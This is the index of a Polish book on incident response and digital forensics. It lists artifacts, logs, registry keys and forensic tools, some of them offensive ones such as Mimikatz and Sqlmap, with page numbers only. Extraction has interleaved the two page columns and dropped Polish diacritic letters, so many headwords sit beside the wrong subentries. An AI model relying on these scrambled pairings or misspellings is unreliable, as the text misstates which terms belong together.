znacznikw czasowych, 294 bloki rozruchowe, 401
anomalie sieciowe, 281 blokowanie
aplikacja, 276 adresw IP, 555
Apple Mail zapisu, 193, 194
format danych, 470 bdy procesu naprawczego, 565
narzdzia, 470 BOM, bill of materials, 432
przechowywanie danych, 470 botnet, 379
artefakt, 282, 392396, 433435 bufor danych o zgodnoci aplikacji, 339
Facebooka, 478
poczty gosowej, 474
C
w pamici, 381
wykonywanych plikw, 394 CAINE, 81
ASL, Apple System Log, 422 Caswell, 131
atak cele
metod phishingu, 239 reakcji na incydent, 47
na klawisze trwae, 389 ledztwa, 273
typu brute force, 313 certyfikaty S/MIME, 74
typu spear phishing, 37, 40, 463 charakterystyka incydentw, 101
typu SQL injection, 31, 141 chat na Facebooku, 476
ataki na pami, 382 CLF, Common Log Format, 260
atrybuty INDX, 300, 394 COM, Component Object Model, 349
automatyczne cookies, 446, 452, 456, 461
adowanie plikw, 341 cyberprzestpcy, 28
montowanie urzdze, 197 cyberszpiegostwo, 30
uruchamianie, 341 cykl
automatyzacja, 164 faz ataku, 40
autostart, 341 generowania wskanika, 120
SKOROWIDZ 589
czarna dziura DNS, 99 domena

czas lokalna, 410, 411
lokalny systemu, 323 sieciowa, 410
prowadzenia dziaa naprawczych, 570 systemowa, 410, 413
czonkowie uytkownika, 410, 415
zespow, 49 dostp
zespou naprawczego, 539 do bazy danych FileAdvisor, 493
czujniki do HPA, 187
hostowe, 231 do konfiguracji sieci, 97
IDS, 231 do szkodliwych witryn internetowych, 488
sieciowe, 214 do zdobytych danych, 277
czynnoci dostpne dowody, 393396, 434, 435
naprawcze, 47, 62 dostpno danych, 71
wstpne, 54 dowizanie symboliczne, 305
zaradcze, 563 dowody, 311
pocztkowe, 142
D usunitych plikw, 394
wstrzykiwania, 383
dane wykonywania pliku, 393
aplikacji, 438, 440 z sieci, 203
Linux, 440 drzewo VAD, 380
OS X, 440 duplikacja
poszczeglnych uytkownikw, 440 danych ledczych, 185
Windows, 439 sprztu firmy Apple, 200
klientw, 144, 148 duplikat na potrzeby ledztwa, 186
konfiguracyjne, 439, 440 duplikowanie
list szybkiego dostpu, 367 dziaajcego systemu, 199
na ywo, 156 maszyn wirtualnych, 201
powiadczajce tosamo, 381 rodkw firmowych, 200
rejestru, 332
dyrektywa
rezydentne, 297
datadir, 266
sieciowe, 215
general_log, 266
uytkownika, 276
general_log_file, 266
DCO, Drive Configuration Overlay, 188
log_error, 266
debugger, 126, 504
dyski rozruchowe, 81
GNU, 183
dystrybucja Security Onion, 213
definiowanie wartociowych tropw, 118
dzia prawny, 569
dekodowanie artefaktw, 303
dziaania strategiczne, 564
demony LaunchDaemons, 430
DHCP, 234 dziennik
DIB-CS/IA, 136 query.log, 239
DLL search order hijacking, 32 wifi.log, 428
DMZ, 31, 223, 573 dzienniki
DNS, Domain Name System, 99, 238 aplikacji, 312, 422
dodawanie filtru, 509 bezpieczestwa, 393
dokument RFC 1035, 128 bdw, 263
dokumentacja, 75, 82, 486 DHCP, 237
zdobytego dowiadczenia, 557 DNS, 242
dzienniki narzdzia, 478

ERRORLOG, 265 przechowywanie dziennikw, 476
metryczne programu Altiris, 247 fazy cyklu ataku, 40, 560
operacyjne harmonogramu zada, 393 file carving, 285
pocze klientw, 263 file slack, 285
programu filtrowanie ruchu, 93
SEP, 250 firmy konsultacyjne, 51
Skype, 473 foldery startowe, 387
Trend Micro OfficeScan, 255 uytkownika, 394
VirusScan, 252 format
rozmw, 474 AFF, 191
serwera CLF, 260
Apache, 260 EWF, 191
IIS, 262 HTML, 479
sieciowe, 231 IOC, 57
systemowe, 312, 422 JSON, 477
usug terminalowych, 395 MIME, 463
usugi Harmonogram zada, 325 NCSA, 260
zabezpiecze, 311, 312, 395, 396 formatowanie raportu, 518
zada zaplanowanych, 393 formaty
zapyta, 263 danych, 274
zdarze, 311, 321, 393 obrazw, 187, 191
bdw i dostpu, 87 plikw dziennikw ASL, 424
zabezpiecze, 320, 330 wskanikw zagroenia, 58
zmian, 302 formuowanie zalece strategicznych, 557
FS-ISAC, 136
funkcja
E BIND, 239
Easy-IDS, 79 ledzenia procesw, 319
edytowanie wskanikw WFP, 388
hostowych, 121
sieciowych, 127
ekspertyza ledcza, 75
G
eksploit, 37 gazie
eksplorator procesw, 511 rejestru, 331, 332
elementy dowodu, 113 uytkownika, 393
emitery NetFlow, 98 generowanie wskanika, 120
eradykacja, 549 GINA, Graphical Identification and Authentication, 350
wirusw, 36 gwna tabela plikw, MFT, 291
ESE, Extensible Storage Engine, 449 Google Chrome
ewaluacja wynikw, 286 cookies, 456
formaty danych, 454
funkcja automatycznego uzupeniania, 456
F historia, 454
Facebook lokalizacje, 454
artefakty, 478 narzdzia, 457
format dziennikw, 477 pami podrczna, 455
SKOROWIDZ 591
pobierane pliki, 456 identyfikatory zdarze, 312

preferencje uytkownika, 456 identyfikowanie systemw
zakadki, 456 kategoryzacja, 59
graficzny interfejs uytkownika, 444 szeregowanie wzgldem wanoci, 59
gromadzenie danych, Patrz zbieranie danych weryfikacja, 59
IDT, Interrupt Descriptor Table, 384
incydent bezpieczestwa, 26, 45
H informacje, 160
haker dotyczce dezinstalacji, 439
destrukcja, 545 na temat sieci, 110
prba przytoczenia organizacji, 545 o aplikacjach dziaajcych w sieci, 246
wstrzymanie aktywnoci, 544 o ataku, 112
zmiana taktyki, 544 o incydencie, 106
harmonogram zada, 322 o nazwach hostw, 238
hasa, 87 o obiektach ostatnio uywanych, 368
haszowanie plikw, 29 o ostatnich poczeniach, 362
Helix, 81 o podpisach cyfrowych, 353
HFS+, Hierarchical File System, 400 o poszczeglnych systemach, 109
alternatywny nagwek woluminu, 401 o serwerach sieciowych, 257
bloki rozruchowe, 401 o systemie, 338, 434
magazyn zarzdzany, 407 o szkodliwym oprogramowaniu, 111
nagwek woluminu, 401, 404 o uytkownikach, 338
ukad woluminu, 401 o zabezpieczeniach, 338
usugi, 407 o zdarzeniach, 231, 311
hierarchiczny system plikw, HFS+, 400 o zdarzeniach usug, 312
HIPS, Host Intrusion Prevention System, 89 o zmianach kont uytkownikw, 317
historia o zmianach zasad zabezpiecze, 317
logowania, 223 informacje o systemach
polece, 381 data dostarczenia, 85
przegldarki, 446 fizyczna lokalizacja, 85
HPA, Host Protected Area, 188 jednostka biznesowa, 85
konfiguracja sieci, 86
przynaleno, 85
I rola usug, 86
IAT, Import Address Table, 384 informowanie o wynikach ledztwa, 75
identyfikacja Infraguard, 136
nazw uytkownikw, 246 infrastruktura
plikw wykonywalnych, 246, 248 globalna, 71
ryzyka, 69 informatyczna, 83
szkodliwych regu automatycznego bezpieczestwo, 90
wykonywania, 351 inwentaryzacja, 86
zasigu incydentu, 151 oprzyrzdowanie, 87
identyfikator sie, 91
4698, 330 urzdzenia komputerowe, 84
602, 330 tylnych drzwi, 35
CLSID, 349
procesu, PID, 377
inspekcja
K
aktywnoci, 420
bazy danych, 419 Kali Linux, 81
logowa, 264 katalog
systemu, 419 Applications, 410413
aplikacji, 443 audit, 419, 425
instalatory aplikacji, 346, 432 AutomaticDestinations, 367
integralno obrazu, 191 CustomDestinations, 367
Internet Explorer Developer, 410, 413
cookies, 452 db, 413
ESE, 450 dslocal, 416
format danych, 447 Eventlog, 312
historia, 451 Library, 410, 413
Index.dat, 449 Network, 410
lokalizacje, 447 opt, 413
narzdzia, 453 Prefetch, 307
pami podrczna, 452 receipts, 432
zakadki, 453 Recycler, 369
internetowe usugi pocztowe, 464 sandbox, 421
inwentaryzacja infrastruktury informatycznej, 86 security, 419
inynieria System, 410, 413
aplikacji, 569 Users, 415
sieciowa, 569 katalogi
systemw, 569 danych aplikacji, 439
IOC, Indicators of Compromise, 56 instalacyjne aplikacji, 439
IOC Editor, 57 w domenie uytkownika, 415
IR, incident response, 48 keylogger, 512
istotne informacje klawisze trwae, 389
lista klienty
aktualnie wykonywanych i zaplanowanych poczty elektronicznej, 463
dziaa, 63 wiadomoci byskawicznych, 472
dotknitych systemw, 63 klucz
dziaa hakera, 63 Active Setup, 346, 347
hostowych wskanikw zagroenia, 63 CIDSizeMRU, 360
interesujcych plikw, 63 ComDlg32, 359
kont, 63 deszyfrowania SSL, 225
sieciowych wskanikw zagroenia, 63 gwny sesji, 225
skradzionych danych, 63 Installed Components, 346
uytych plikw, 63 KnownDLLs, 390
zgromadzonych dowodw, 63 LastVisitedPidlMRU, 360
izolowane sieci wirtualne, 485 MonitorLog, 245
MUICache, 358, 359
OpenSavePidlMRU, 360, 361
J RecentDocs, 361
jako monitora sieciowego, 215 Run, 345
jdro typu BSD, 180 RunOnce, 345
RunMRU, 360
SKOROWIDZ 593
shellbag, 355 koordynacja prac zespou, 71

SshHostKeys, 445 kopia zapasowa
StartCalendarInterval, 430 katalogu, 416
TypedPaths, 361 woluminu, 303
TypedURLs, 361 Kosz, 369
UserAssist, 357 koszt utrzymywania zespou, 50
klucze KPP, Kernel Patch Protection, 384
automatycznego uruchamiania, 341, 394 kradzie danych, 32, 217
automatycznego wykonywania, 354 kwarantanna programu antywirusowego, 249
instalatora aktywnego, 346
MRU, 359, 393, 394
rejestru, 336
L
programu SLM, 244 lider procesu naprawczego, 537, 556
w gaziach uytkownikw, 355 likwidacja zagroenia, 548
kodowanie, 501 lista
kolejno wczytywania bibliotek DLL, 389 aktualnie wykonywanych dziaa, 63
komunikacja dotknitych systemw, 63
wewntrzna, 73 dziaajcych usug, 345
z usugodawcami zewntrznymi, 74 dziaa hakera, 63
komunikator internetowy hostowych wskanikw zagroenia, 63
AIM, 478 interesujcych plikw, 63
metody analizy, 472 kont, 63
Skype, 473 KnownDLLs, 391
konfiguracja kontrolna, 105
oprzyrzdowania, 443 kontrolna wykrycia incydentu, 107
serwera MRU pulpitu zdalnego, 362
HTTP Apache, 259 ostatnio otwieranych plikw, 359
IIS, 261 ostatnio uruchamianych programw, 360
sieci, 84, 91 plikw DLL, 347
systemu Windows, 336 sieciowych wskanikw zagroenia, 63
rodowiska, 443 skradzionych danych, 63
rodowiska wirtualnego, 491 szybkiego dostpu, 367
urzdze komputerowych, 83 uytych plikw, 63
usug, 415 zgromadzonych dowodw, 63
usug w rejestrze, 342 logowanie
uytkownika, 415 do systemu, 351
konsola domena, 314
at, 322 identyfikator sesji, 314
schtasks, 322 interakcyjne, 314
sieciowa, 223, 226 nazwa uytkownika, 314
konta uytkownikw, 416 proxy, 314
konto przez usugi terminalowe, 315
System lokalny, 341 sieciowe, 314
Usuga lokalna, 342 typ, 314
Usuga sieciowa, 342 uytkownika, 435
kontrola dostpu, 93, 95 w celu odblokowania, 314
ko trojaski, 37 w trybie usugi, 314
logowanie metody
wsadowe, 314 akcji naprawczej, 540
z podstawowym uwierzytelnianiem, 314 analizy, 271, 282
za pomoc domenowych danych duplikacji, 193
powiadczajcych, 315 MFT, Master File Table, 291
lokalizacje Microsoft Outlook, 465
dziennikw, 259 format danych, 467
plikw konfiguracyjnych, 259 narzdzia, 467
plikw wykonywalnych, 440 przechowywanie danych, 466
treci, 260 Microsoft Outlook for Mac, 470
LSA, Local Security Authority, 348 format danych, 471
narzdzia, 471
przechowywanie danych, 471
miejsca przechowywania danych, 274
adowanie usug, 344 migawka, 485
acuchy, 498 misja zespou RI, 72
w pamici, 381 modelowanie statystyczne, 208
modyfikowanie
kolejnoci wczytywania bibliotek, 389
M systemowych plikw binarnych, 388
Mac OS X monitor
podstawowe dane systemu, 410 procesw, 509
MACE, 295 dodawanie filtru, 509
macierz RAID, 188 sieciowy, 79, 204
magazyn ocena jakoci, 215
bazy danych, 263 wybr sprztu, 211
zarzdzany, 407 monitorowanie
malware, 484 systemu wykonawczego, 508
manual programu Snort, 206 zdarze, 205
mapowanie, 332 urzdze, 197
maszyna wirtualna, 485 Mozilla Firefox
materia dowodowy, 82 cookies, 461
mechanizmy utrwalania, 386 formaty danych, 458
meneder funkcja automatycznego uzupeniania, 461
kontroli usug, 320, 344 historia, 460
pakietw dpkg, 441 lokalizacje, 458
pakietw RPM, 441 narzdzia, 462
pamici, 307 pami podrczna, 460, 462
menu Uruchom, 360 pobierane pliki, 460
metadane, 126, 284, 292 preferencje, 461
dostpne w Koszu, 369 zakadki, 461
NTFS, 292 MPLS, Multiprotocol Label Switching, 214
plikw LNK, 366 MRU, most recently used, 359
pliku, 311 MSDN, Microsoft Developer Network, 495, 499
systemu plikw, 432 muteks, 379
SKOROWIDZ 595
DNSCAP, 243
N
Downloads Viewer, 462
nagwek Emailchemy, 463
pliku, 494 EnCase Forensic, 199
woluminu HFS+, 404 Event Log Explorer, 321
najlepsze praktyki gromadzenia danych, 161 fgdump, 87
naprawa, 529, 559 FileAdvisor, 493
narzdzia FileInsight, 494
analityczne, 386 Foremost, 285
dla Firefoksa, 462 GREP, 493
do analizowania dziennikw, 82 hashutils, 169
do analizy dziennikw zdarze, 321 History Viewer, 462
do analizy Kosza, 372 iBored, 404
do analizy na ywo, 158, 160, 175 INDXParse, 302
do analizy pamici, 345, 379, 384, 385 Internet Evidence Finder, 446, 465
do analizy plikw .pf, 311 Internet Examiner Toolkit, 465
do analizy plikw PE, 504 JumpLister, 368
do analizy rejestru, 363 JumpListParser, 368
do analizy sieciowej, 229 LfLe, 321
do analizy systemw, 168 libpff, 467
do analizy tabeli MFT, 300 Log Parser, 321
do obsugi kopii zapasowych, 275 LogFileParser, 303
do przechwytywania pakietw, 212 Mac Memory Reader, 182
do tworzenia obrazw, 195 Malcode Analysis Pack, 498
do tworzenia obrazw dyskw, 81 Mandiant Memoryze, 171, 174
do wykonywania zrzutw pamici, 385 Mantech MDD, 171
Mimikatz, 381 md5, 493
ledcze, 90 md5deep, 493
YARA, 57 Memoryze for the Mac, 181
narzdzie mft2csv, 300
010 Editor, 494 Microsoft autoruns, 169
AccessData FTK Imager, 198 Microsoft logparser, 169
AccessData FTK Imager Lite, 171, 172 Microsoft procdump, 174
Aid4Mail, 463 Microsoft pslist, 169
analyzeMFT, 300 Microsoft userdump, 174
Cache Viewer, 462 Moonsols Windows Memory Toolkit, 171
CFF Explorer, 503 NetAnalysis, 465
Cookie Viewer, 462 NirSoft DriverView, 169
cron, 429 NirSoft OpenedFilesView, 169
DC3dd, 195 Nirsoft Registry Analysis Tools, 365
DCFLdd, 195 NSRL, 493
DCode, 481 Ntsecurity.nupmdump, 174
dd, 195 parser-usnjrnl, 303
Dependency Walker, 503 PC-Tools.net md5sums, 169
DiamondCS openports, 169 persistence, 353
DigestIT2004, 493 PeView, 503
Digital Detective NetAnalysis, 446 PEiD, 501
narzdzie
O
plaso, 300
Plaso, 321 obiekt wzajemnego wykluczania, 379
Podgld zdarze, 321 obiekty
Podczanie pulpitu zdalnego, 362 COM, 349
PsExec, 319 pomocnicze przegldarki, BHO, 349
PSLogList, 321 obraz dysku, 60, 81, 187, 277
Python-Evtx, 321 obraz logiczny, 187, 190
Redline, 379 obraz partycji, 187, 190
RedWolf Forensics Prefetch-Parser, 311 obrazy ledcze, 192
sbag, 365 obszar
services, 353 DCO, 188, 190
shellbags.py, 365 HPA, 188, 190
ShimCacheParser, 364 ochrona danych, 76
Simple File Parser, 367 osobowych, 71
Skype Analyzer, 476 odnoniki, 366
Skype Log View, 476 ograniczanie
SkypeAlyzer, 476 komunikacji, 95
SkypeParser, 476 zasigu incydentu, 545, 570
SysInternals strings, 498 okno waciwoci pliku, 294
ThreatExpert, 493 okrelanie zasigu incydentu, 139, 148
TZWorks Journal Parser, 303 operacja RegSetValue, 444
TZWorks lp, 367 operacje biznesowe, 569
TZWorks Prefetch Parser, 311 oprogramowanie
QExtract, 252 dla zespou RI, 79
rcracki_mt, 87 dodatkowe, 440
setmace, 295 ledcze, 82, 442
SLM Browser, 245 wirtualizacyjne, 485
Snort, 211 oprzyrzdowanie, 87, 97
Sqlmap, 226 organizacja, 68
Sysinternals PsSuite, 35 treci raportu, 521
tcpdump, 207, 211 ostatnio uywane elementy, MRU, 359
UserAssist Didiera Stevensa, 365 oszustwa
VirusTotal, 493 typu scareware, 463
Volatility Framework, 345, 379 w ACH, 149, 151
winacq.exe, 199
winen.exe, 199
P
WinMD5, 493
WinPrefetchView, 311 paczki aplikacji, Application Bundles, 411
Network Security Toolkit, 79 pakiet
noniki danych FPNWCLNT, 348
wewntrzne, 76 KDCSVC, 348
zewntrzne, 77 MSI Redline, 166
NTFS, NT File System, 291 scecli, 348
NTP, Network Time Protocol, 234 Sleuth Kit, 300
SLM, 246
SysInternals, 378
SKOROWIDZ 597
pakiety pagefile.sys, 382

LSA, 348 places.sqlite, 459
powiadamiania usugi logowania, 350 prefs.js, 459
powiadomie, Notification Packages, 348 ProcessDD.bat, 174
uwierzytelniania, Authentication Packages, 348 przepenie, 405
zabezpiecze, Security Packages, 348 SchedLgU.txt, 325328, 393
pami, 372 SecEvent.Evt, 312
fizyczna, 373 Security.evtx, 312
podrczna przegldarki, 446 sethc.exe, 126, 127, 389
parser bufora danych o zgodnoci aplikacji, 340 startowy, 407
PatchGuard, 384 stronicowania, 374
PFF, Personal Folder File, 467 svchost.exe, 343
phishing, 37, 239 SysEvent.Evt, 312
piaskownica, sandbox, 507 System.evtx, 312
PID procesu nadrzdnego, 377 tmpbkxcn.php, 228
pisanie raportw, 515 ufile.bin, 497
plan userinit.exe, 351
eradykacji, 578, 580 wins.exe, 379
likwidacji zagroenia, 548, 552 pliki
naprawczy, 568 .evtx, 312
planowanie procesu .job, 325, 326, 392
eradykacji, 553 .lnk, 361
naprawy, 560 .pf, 307
platforma .NET Framework, 347 bazy danych Oracle, 267
plik binarne, 388
\$Recycle.Bin, 369, 371 definicji dziaa typu CRON, 430
alokacji, 405 DLL, 347, 389, 394
AppEvent.Evt, 312 DLL COM, 349
Application.evtx, 312 DLL GINA, 350
atrybutw, 405 dziennikw systemowych, 231
bookmarks.html, 459 EVT, 312
config.xml, 475 hibernacji, 376
cookies.sqlite, 459 konfiguracji usug, 430
dns.txt, 241 konfiguracyjne systemu, 419
downloads.sqlite, 459 kwarantanny programu
edi-source.bin, 220 SEP, 251
edi-transfer.bin, 221, 222 Trend Micro OfficeScan, 255
index.dat, 449 VirusScan, 254
Indicators-network.txt, 409 LNK, 366, 394
katalogowy, 405 OST, 467
launchd.pslist, 430 PE, 501
Layout.ini, 307 PFF, 467
main.db, 474 pobierane z wyprzedzeniem, 310, 393
MemoryDD.bat, 171 spakowane, 504
named.conf.local, 239, 240 wczytywane z wyprzedzeniem, 308
NTOSBOOT-B00DFAAD.pf, 307 wykonywalne przenone, PE, 501
ntshrui.dll, 391 z metadanymi NTFS, 292
Outlook.pst, 466 zakodowane, 501
patne narzdzia ledcze, 467 procedury komunikacji, 73

pobieranie proces, 318, 376
danych, 81 eradykacji, 549, 553, 581
zasobw z wyprzedzeniem, 306 likwidacji zagroenia, 548, 564
zawartoci pamici, 60 naprawczy, 529532, 559
pocztkowe stadium wamania, 41 studium przypadku, 567
podgld zdarze, 321 wybr czonkw zespou, 569
podpisy cyfrowe, 354 reakcji na incydent, 53
podrcznik Snort, 131 svchost.exe, 345
pola rekordu MFT, 292 winlogon.exe, 350
polecenie program
arp, 177 AutoRuns, 364
at, 322 Altiris, 247, 248
cat, 176 Altiris Application Metering, 247
date, 176 Altiris Client Management Suite, 246
dd, 195 Apple Mail, 469
dmesg, 197 BKDNS, 32
dpkg, 176 BKDOOR, 32
file, 496, 497 cardharvest.exe, 36
find, 177 CFF Explorer, 503
ifconfig, 177 cmd.exe, 360
kextstat, 177 DumpIt, 385
kldstat, 177 EnCase, 442, 467
ls, 177 EnCase v6, 278
lsmod, 177 FTK, 442, 467
lsof, 177 FTK Imager, 192, 385
md5, 177 ftp.exe, 217
mount, 176 GFI Sandbox, 507
netstat, 177 JumpLister, 367
pkg_info, 176 Libpff Project, 467
ps auxwwwem, 177 libvshadow, 305
pslist, 35 LiME, 179
rpm, 176 Linux Memory Extractor, 179
sc, 344 lsass.exe, 381
schtasks, 324 malware.exe, 351
tasklist, 345 Mandiant Redline, 353
tasklist /svc, 345 McAfee VirusScan, 252
uname, 176 Memoryze, 384
w, 176 Microsoft Outlook, 465
poczenia sieciowe, 381 mimikatz.exe, 37
poczenie MUICacheView, 359
C2, 36 NetWitness Investigator, 230
FTP, 32 OllyDbg, 504
RDP, 32, 33 plutil, 413
powiadomienia usugi logowania, 350 PROXY, 32
powoka logowania, 351 PsExec, 320
priorytety ledztwa, 113 PuTTY, 444
SKOROWIDZ 599
Redline, 165167, 353, 378, 383 przygotowanie na incydent

RegRipper, 363 infrastruktury informatycznej, 83
rifiuti2, 372 organizacji, 68
SEP, 250 zespou RI, 72
services.msc, 360 przystawka services.msc, 344
Shadow Explorer, 305 public relations, 569
SLM, 244 punkty
Snort, 206 udostpniania, 417
Software Management Suite, 244 zaczepienia IAT, 384
SysInternals Autoruns, 353
System Center Configuration Manager, 131
R
tcpdump, 129
Trend Micro OfficeScan, 255 raport, 515
VirtualBox, 491 o stanie sprawy, 75
VMware, 491 z analizy, 75
Volatility Framework, 377, 383, 386 z przeprowadzonych czynnoci, 75
VSC Toolset, 305 ze ledztwa, 75
Windows Registry Decoder, 363 raportowanie, 64
Wireshark, 217227, 512 raporty
ZoomIt64.exe, 360 format, 518
programy organizacja treci, 521
antywirusowe, 89, 249 recenzja, 524
do pakowania, 504 styl, 518
do zarzdzania przedsibiorstwem, 243 tre, 521
do zrzucania skrtw hase, 484 RAT, remote access trojan, 37
rejestrujce naciskane klawisze, 512 RDP, Remote Desktop Protocol, 32, 362
prosty duplikat, 190 readresator systemu plikw, 305
reakcja na incydent, IR, 27, 48, 50, 53, 530
protok
analiza danych, 60
AFP, 427
czynnoci naprawcze, 62
DHCP, 235
czynnoci wstpne, 54
IMAP, 465
identyfikowanie systemw, 58
POP, 465
raportowanie, 64
RDP, 32
rejestrowanie istotnych informacji, 63
przechowywanie danych
ledztwo, 54
konfiguracyjnych, 439
tropy wstpne, 55
programu Apple Mail, 470
wskaniki zagroenia, 56
programu Outlook, 466 zachowywanie dowodw, 59
przechwytywanie zasady, 69
danych, 205 reguy automatycznego wykonywania, 351
pakietw, 212 rejestr systemu Windows, 330
zdarze, 384 analiza, 336
przegldarka internetowa, 445 dane, 332
Google Chrome, 453 klucz, 332
Internet Explorer, 447 klucze, 336
Mozilla Firefox, 458 odbijanie, 335
przetwarzanie artefaktw, 303 przekierowywanie, 335
przydzia adresw IP, 235 wartoci, 332
rejestrowanie HTTP Apache, 259

danych DNS, 243 IIS, 260
debugowania, 240 NTP, 234
istotnych informacji, 63 SSH, 444
nagwkw, 207 serwery
pakietw, 207 baz danych, 263
zapyta DNS, 240 proxy, 93, 98
zapyta SELECT, 265 sieciowe, 257
rekonesans wewntrzny, 42 sesja
rekordy rezydentne, 293 RDP, 362
repozytorium dokumentw, 129 SSL, 224
RFC, Request for Comments, 129, 235 sie
rodzaje dokumentacja, 97
monitoringu sieciowego, 205 kontrola dostpu, 92
oprogramowania, 81 ograniczanie komunikacji, 95
routery, 231 oprzyrzdowanie, 97
rozszerzenia przedsibiorstwa, 92
do Firefoksa, 457 segmentacja, 92
paczek, 411 usugi sieciowe, 98
powoki, 349 VPN, 38
RTIR, 64 SIEM, Security Information
ruch and Event Management, 38
na serwerze, 210 skad zespow ledczych, 49
poziomy, 315 skadanie pozwu, 135
SSL, 227 skrt MD5, 122, 353, 493
ryzyko, 69 skrypt
infekcji, 485 jobparser.py, 327
landesk_slm.py, 245
shellbags.py, 365
S ShimCacheParser.py, 340
sandbox, 507 skuteczno wskanika, 131
SANS, 70 Skype
schemat artefakty, 474
ograniczonego rodowiska finansowego, 573 narzdzia, 476
procesu naprawczego, 532 preferencje, 475
sieci dziau finansowego, 94 przechowywanie dziennikw, 473
sieci przedsibiorstwa, 92 SLM, Software License Monitoring, 244
Security Onion, 79 Snare dla Windows, 88
segmentacja sieci, 92 Snort IDS and IPS Toolkit, 131
sekcje, 379 SO, Security Onion, 213
sektor rozruchowy, 188 sortowanie szkodliwych programw, 483
SEP, Symantec Endpoint Protection, 250 sprawdzanie stanu usugi, 344
serwer sprztowe blokady zapisu, 193
BIND, 239 SQL injection, 31
DHCP, 150, 231 SSDT, System Service Dispatch Table, 384
DHCP ISC, 238 strategia, 62
DNS, 239, 240 na przyszo, 582
SKOROWIDZ 601
strefa usunitych plikw, 394

czasowa, 105 wykonywania pliku, 393
uderzeniowa, strike zone, 552 ledzenie procesw, 318
zdemilitaryzowana, DMZ, 31, 223, 573 ledztwo, 47, 54
struktura badanie aplikacji, 441
kluczy shellbag, 356 definicja celw, 272
Kosza, 369 dowody, 311
nagwka woluminu, 403 dowody ruchu poziomego, 362
ograniczonego rodowiska finansowego, 571 prawidowe rozpoczynanie, 103
rekordu pliku MFT, 293 priorytety, 113
strumienie ADS, 298 robienie notatek, 111
studium przypadku tworzenie duplikatw, 186
Certyfikat autentycznoci, 37 w systemach Mac OS X, 399
Gdzie s pienidze, 31 w systemach Windows, 289
styl raportu, 518 w terenie, 77
system we wasnej siedzibie, 78
monitorowania sieci, 211 weryfikacja, 131
operacyjny, 276 zbieranie danych, 274
plikw, 395 zbieranie faktw, 104
HFS+, 400 rodki zaradcze, 542
NTFS, 291 opracowywanie, 542
zapobiegania wamaniom, HIPS, 89 wdraanie, 542
systemy rodowisko do sortowania, 489
BSD, 181 rdliniowy punkt zaczepienia, 384
do przechwytywania caej treci, 98
do zarzdzania sprawami, 64 T
IDS, 207
tabela MFT, 392, 394
OEM, 188
tablica
operacyjne, 81
IAT, 384
wykrywania intruzw, 97
IDT, 384
szeregowanie systemw, 59
SSDT, 384
szkodliwe
taktyka, 62
oprogramowanie, malware, 484, 492
technika MPLS, 214
reguy automatycznego wykonywania, 351
techniki naprawcze, 529
witryny internetowe, 488
testowanie sensownoci, sanity checking, 286
szkolenie
testy
uytkownikw, 71 penetracyjne systemw, 572
zespou RI, 76 wstpne, 536
szperanie w systemie, 42 trafienie, hit, 58
szukanie, Patrz wyszukiwanie tropy, leads, 118
szyfrowanie typu end-to-end, 35 wewntrzne, 133
wstpne
istotno, 56
przydatno, 56
lady szczegowo, 56
kradziey danych, 281 zamienianie we wskaniki, 120
sesji interaktywnych, 365 zewntrzne, 134
tworzenie usugi
dokumentacji, 82 dla przedsibiorstw, 233
duplikatw, 186 infrastruktury sieciowej, 234
filtru, 509 pomocnicze, 420
obrazu sieciowe, 98, 276
dysku, 81, 188 systemu plikw, 407
logicznego, 190 systemu Windows, 319, 341
partycji, 190 terminalowe, 362
systemu, 433 ustalanie oczekiwa, 114
systemu monitorowania sieci, 211 ustanowienie punktu wejcia, 41
wskanika, 121 ustawienia
wskanikw zagroenia, IOC, 56, 82 konfiguracyjne launchd, 430
zada, 322, 324 oprzyrzdowania, 443
zespou naprawczego, 536 zgodnoci, 339
tylne drzwi, backdoor, 31, 39 usunite pliki, 293
typ weryfikacji, 132 uwierzytelnianie
dwuskadnikowe, 93
Kerberos, 348
U szyfrowane, 348
UAC, User Access Control, 163 uzyskiwanie informacji, 135
uchwyty, 378 uycie Kosza, 371
ukad
dysku, 188
systemu plikw, 410
V
upowanienie, 50 VAD, Virtual Address Descriptor, 380
uprawnienia do wyszukiwania informacji, 49 VSC, Volume Shadow Copy, 303
uruchamianie
aplikacji, 443
systemu, 435
W
szkodliwego programu, 508 warto
urzdzenia AppInt_DLLs, 348
komputerowe, 84 EnablePrefetcher, 308
zarzdzanie, 85 HostingAppList, 308
usuga ImagePath, 343
ASL, 423 rejestru AppInt_DLLs, 347
DHCP, 234, 235 ServiceDll, 343
DHCP ISC, 237 Shell, 351
GINA, 350 StubPath, 347
Harmonogram zada, 325 Userinit, 351
katalogowa, 416 wdraanie
LanmanWorkstation, 343 czujnika sieciowego, 214
launchd, 429 wskanikw zagroenia, 57
LSA, 348 weryfikacja, 131
PsExec, 319 wewntrzna skadnica wiedzy, 83
Spotlight, 407 wze sharepoints, 417
usbmuxd, 427 Windows Server 2003, 236
wudfsvc, 344 Windows Server 2008, 236
SKOROWIDZ 603
Windows Server 2012, 236 wywietlanie

wirtualne rodowisko, 485 ADS, 299
wirtualny deskryptor adresw, VAD, 380 listy kopii woluminw, 305
wirus
Flame, 348
Zeus, 378
Z
wamanie zabezpieczenie KPP, 384
do usugi sieciowej, 223 zachowywanie dowodw, 59
metod RFI, 560 zadania
wasnoci uytkownika, 417 cykliczne, 387
waciwoci pliku, 294 zaplanowane, 322, 323, 429
wolne miejsce w pliku, 285 zajcie pozycji, 62
wolumin HFS+, 401 zakoczenie misji, 43
WRP, Windows Resource Protection, 388 zalecenia, 582
wskanik strategiczne, 557
Emerging Threats, 206 zaadowane sterowniki, 381
rejestru, 127 zapewnienie nieprzerwanego dostpu, 42
systemu plikw, 127 zapisywanie
wskaniki informacji o ataku, 112
anomalne, 120 ruchu DNS, 243
hostowe, 120, 121 zapory sieciowe, 97, 231
metodyczne, 120 zarzdzanie
oparte na waciwociach, 120 przedsibiorstwem, 243
sieciowe, 120, 127 rodkami, 85
zagroenia, 56, 82 zasady
formaty, 58 bezpieczestwa, 70
wdraanie, 57 dopuszczalnych dziaa, 70
wstpna akcja naprawcza, 574 dostpu zdalnego, 70
wstrzykiwanie procesw, 382 korzystania z internetu, 70
wtyczka zasig incydentu, 139, 148, 151, 545, 570
apihooks, 384 zasoby ledcze, 78
OllyDump, 505, 506 zaufane pliki binarne, 168
wybr czonkw zespou, 569 zbieranie
wyciek danych klientw , 144, 148 danych, 153
wykonanie obrazu dysku, 60 dodatkowych, 108
wykrywanie na ywo, 155
incydentw, 101, 107 najlepsze praktyki, 161
szkodliwych usug, 352 narzdzia wasne, 168
wynajmowanie firmy konsultacyjnej, 51 w systemach uniksowych, 174
wyszukiwanie w systemach Windows, 165
anomalii, 281 w systemach z jdrem typu BSD, 180
